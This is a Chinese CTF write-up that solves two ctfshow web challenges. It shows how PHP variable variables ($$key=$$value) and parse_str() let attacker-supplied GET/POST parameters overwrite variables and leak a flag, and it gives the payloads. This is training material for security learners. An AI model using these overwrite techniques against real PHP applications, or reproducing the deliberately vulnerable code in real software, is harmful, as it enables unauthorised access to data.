2022年1月10日03:34:17评论241 views字数 1281阅读4分16秒阅读模式

前言

记录web的题目wp，慢慢变强，铸剑。

变量覆盖web105

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛？';
$suces='既然你想要那给你吧！';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

这里利用的是变量覆盖，关键点在$$key=$$value，这里把$key的值当作了变量

我们传入error=flag
$key=error
$value=flag
$$key=$$value就变成了$error=$flag，就成功使$flag覆盖了$error

所以这里就可以利用变量覆盖进行获取flag

payload

第一种：

通过$error输出我们的flag，即转入一个gylq的变量接收flag值，然后再第二个循环将gylq的值赋值给error，就可以达到die输出flag了

GET
?gylq=flag

POST
error=gylq

第二种：

通过$suces输出我们的flag，即给suces赋值flag，然后第二个循环传入flag为key赋值为空，就可以达到不执行die的目的

GET
?suces=flag

POST
flag=

变量覆盖web107


highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }

}

这题考的是parse_str(string，array)的变量覆盖利用

参数描述

string 必需。规定要解析的字符串。

array 可选。规定存储变量的数组的名称。该参数指示变量将被存储到数组中。

参数	描述
string	必需。规定要解析的字符串。
array	可选。规定存储变量的数组的名称。该参数指示变量将被存储到数组中。

举例

$a = "name=gylq&amp;age=10";
parse_str($a,$b);
echo $b['name'].','.$b['10'];
#输出结果
//gylq,10

payload

GET
v3=1

POST
v1=flag=c4ca4238a0b923820dcc509a6f75849b

FROM:gylq.gitee Author:孤桜懶契

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【ctfshow】变量覆盖简单理解 wp

前言

变量覆盖web105

变量覆盖web107

蓝牙CTF题目汇总

2025騰訊遊戲安全大賽(安卓初賽)

【WP】第四届SQCTF网络安全及信息对抗大赛Re方向题目全解

【CTFer成长之路】CTF中的SQL注入

UCSC CTF 2025高校网络安全联合选拔赛 writeup

2025騰訊遊戲安全大賽(安卓決賽)

MIPS栈溢出漏洞实战解析：从DVRF题目看ROP链构造

第四届商师校赛-web（ak）

【buuctf】[极客大挑战]PHP

【WP】第四届SQCTF大赛Crypto方向题目全解

发表评论

在线咨询

微信